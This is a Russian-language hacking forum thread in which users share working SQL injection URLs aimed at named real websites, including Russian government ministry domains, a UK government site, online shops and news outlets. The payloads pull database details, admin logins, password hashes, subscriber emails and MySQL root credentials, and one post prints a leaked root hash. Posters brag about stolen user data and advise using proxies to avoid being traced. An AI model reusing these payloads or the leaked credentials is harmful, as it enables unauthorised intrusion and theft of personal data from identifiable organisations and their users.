SQL Инъекции

боян

а вот от меня, к сожалению 3 версия скорее всего

Code:

http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+4/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+8/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+9/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+AND+ascii(lower(substring(version(),1,1)))=52/*

здесь ничего интересного:

Code:

http://www.iwdp.co.uk/profile.php?id=-220+union+select+1,name,3,4,5,6,7,8,9,10,11+from+regions/*

здесь не смог сделать вывод (название знакомое, кажется уже ковырял эту скулю)

Code:

http://www.biodiversityscotland.gov.uk/pageType1.php?id=2&type=1&navID=-27+union+select+1,2,3,4,5,6/*

 

2Thanat0z
/me смеялся =)

 

Code:

http://www.no2anticommunism.org/ru/index.php?info=doc&Id=-40+union+select+1,passwd,3,4,5,6,7,8,9,10,11,12+from+users/*

Code:

http://socdvig.org.ru/index.php?action=viewnews&id=-31+union+select+1,2,3,4,5,6,7+from+users/*

 

Сайт http://www.singletrackworld.com/ Одна большая скуль инъекция.
Inj:

Одна колумна, таблица users. Мускул версии 5.0.22 (Весь вывод в title)
Теперь через лимит дёргаем пассы.

add:

Звёздочку поставил, ибо на первом месте стоит походу не админ. Дальше уже перебором.=]

 

лимит вывод ограничивает, а то скрипт наровит всё вывести.

а тут просто мыла

жалко только до данных моделей чёт не смог добраться

 

пфф, вы название темы видели? =\

 

Code:

http://003.saratov.ru/stroki.php?strk=11005&gsn=-1+union+select+concat(user(),char(58),version())/*
http://003.saratov.ru/stroki.php?strk=11005&gsn=-1+union+select+concat(login,char(58),pass)+from+users+limit+0,1/*

Code:

http://www.info-shop.ru/index.php?idk=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(database(),char(58),user(),char(58),version()),13/*

Code:

http://www.vzamen.ru/index.phtml?act=lot_list&title=cat_list&cat_id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3/*

Code:

http://www.globussalon.ru/detail.php?chapId=-1+union+select+concat(database(),char(58),user(),char(58),version())/*

 

черт, я более 3 недель скулей не искал, вообще не внимателен, раз там 4 версия, покажите мне юнион

да, туплю я всегда делал скуль с первой переменной, а тут чет подумал сделать со второй, ради разнообразия не знал что от этого ничего не происходит Век живи, век учись

 

Code:

http://www.spe-moscow.org/ru/news/index.php?id=-36+union+select+1,2,3,4,database()/*

Code:

http://recycling.org.ru/modules/event/index.php?op=show&id=-5+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5/*

 

Можете объяснить что тут не так? Запрос к базе там такой стоит, или order+by в этой базе работает не так как обычно? =/

 

Code:

http://www.sport.com.ua/vote.phtml?id=-180+union+select+concat(username,char(58),password),2+from+users/*

 

расшивровываем и ищем админку

Code:

http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat(username,char(58),password)+from+admin/*

ну на кройняк можно и на форум напасть

Code:

http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat(username,char(58),user_password)+from+phpbb_users+limit+4,1/*

 

Code:

http://www.espana.ru/rus/espanola/kp/kp.php?did=1000000+union+select+1,2,3,concat(user(),char(58),version()),5,6,7,8/*
http://www.espana.ru/rus/espanola/kp/kp.php?did=1000000+union+select+1,2,3,concat(login,char(58),password),5,6,7,8+from+user+limit+0,1/*

Code:

http://www.komus-opt.ru/news.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3/*

 

shop

Code:

http://www.berneboek.com/shop/product.php?id=-2691+union+select+1,password,3,4+from+users/*

 

Code:

http://www.daymusic.ru/announce.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*

доступ к мускл.юзер был, потом исчез о_0

 

mnr.gov.ru Вытянул мыло подписчиков, логин, пароль, мыло пользователей.

Code:

http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4/*
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(user,char(58),password),3,4+from+mysql.user+limit+0,1/*
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,email,3,4+from+subscribe+limit+0,1/*
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(login,char(58),password,char(58),email),3,4+from+users+limit+0,1/*

Не забываем юзать прокси!

Code:

http://www.kharkov-sport.com/news.phtml?id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11/*

 

Бгга =)

http://les.mnr.gov.ru

Code:

http://les.mnr.gov.ru/part/?act=more&id=1432&pid=-1+union+select+concat(login,char(58),password),2+from+users/*

http://voda.mnr.gov.ru

Code:

http://voda.mnr.gov.ru/part/?pid=-1+union+select+1,concat(login,char(58),password),3,4+from+users/*

 

Какие то там пилоты. http://www.calpilots.org/

11 column, table: mysql.user

user,password

root:161de26c23c0854e

 

Седня слабенько(( Турагентсво.

И аватарки (выводится только двойка, между банерами)

 

Мимо надписи "France opens secret UFO files covering 50 years" несмог равнодушной пройти =)

Code:

http://www.breitbart.com/article.php?id=1'+union+select+1,2,DATABASE(),4,5,6,USER(),8,9,10,11,12/*

А вот если на запрос:

Code:

http://www.breitbart.com/article.php?id=1'+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+mysql.user/*

Отвечает "Access denied" всё вилы?(